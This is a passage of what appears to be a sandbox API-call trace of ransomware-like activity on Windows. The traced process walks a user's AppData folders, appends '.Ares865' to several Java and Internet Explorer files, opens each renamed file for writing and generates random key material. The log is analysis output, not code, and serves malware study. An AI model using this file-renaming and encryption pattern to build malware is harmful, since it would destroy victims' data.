lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects" [0109.260] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB" [0109.260] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities" [0109.260] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}" [0109.261] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe" [0109.261] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2" [0109.262] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics" [0109.262] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries" [0109.262] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights" [0109.263] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player" [0109.263] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache" [0109.263] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R" [0109.264] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat" [0109.264] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0" [0109.264] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security" [0109.265] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache" [0109.265] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts" [0109.266] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms" [0109.266] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab" [0109.266] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow" [0109.267] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun" [0109.267] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java" [0109.267] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45" [0109.268] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.Ares865") returned 85 [0109.268] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab.ares865"), dwFlags=0x1) returned 1 [0109.270] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.270] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25340970) returned 1 [0109.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.270] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.271] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.271] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.420] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.421] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.421] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.432] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi.Ares865") returned 91 [0109.432] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi.ares865"), dwFlags=0x1) returned 1 [0109.435] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.435] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=906752) returned 1 [0109.435] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.435] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.435] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.435] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.436] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.436] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.476] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.477] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.477] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.489] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment" [0109.490] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.Ares865") returned 96 [0109.490] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties.ares865"), dwFlags=0x1) returned 1 [0109.494] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.494] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=719) returned 1 [0109.494] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.495] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.495] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.495] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.500] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.501] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.501] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.501] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp" [0109.502] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si" [0109.502] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security" [0109.502] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU" [0109.503] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.Ares865") returned 73 [0109.503] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab.ares865"), dwFlags=0x1) returned 1 [0109.514] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.514] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=581730) returned 1 [0109.514] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.514] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.514] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.514] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.515] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.515] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.600] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.602] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.602] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.610] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi.Ares865") returned 73 [0109.610] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi.ares865"), dwFlags=0x1) returned 1 [0109.622] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.622] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=185344) returned 1 [0109.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.623] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.623] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.623] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.689] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.690] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.690] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.693] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft" [0109.694] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer" [0109.694] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services" [0109.695] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore" [0109.695] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.Ares865") returned 101 [0109.695] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat.ares865"), dwFlags=0x1) returned 1 [0109.698] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.698] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32768) returned 1 [0109.698] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.699] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0109.699] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0109.699] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0109.699] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.699] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0109.722] CryptAcquireContextW (in: 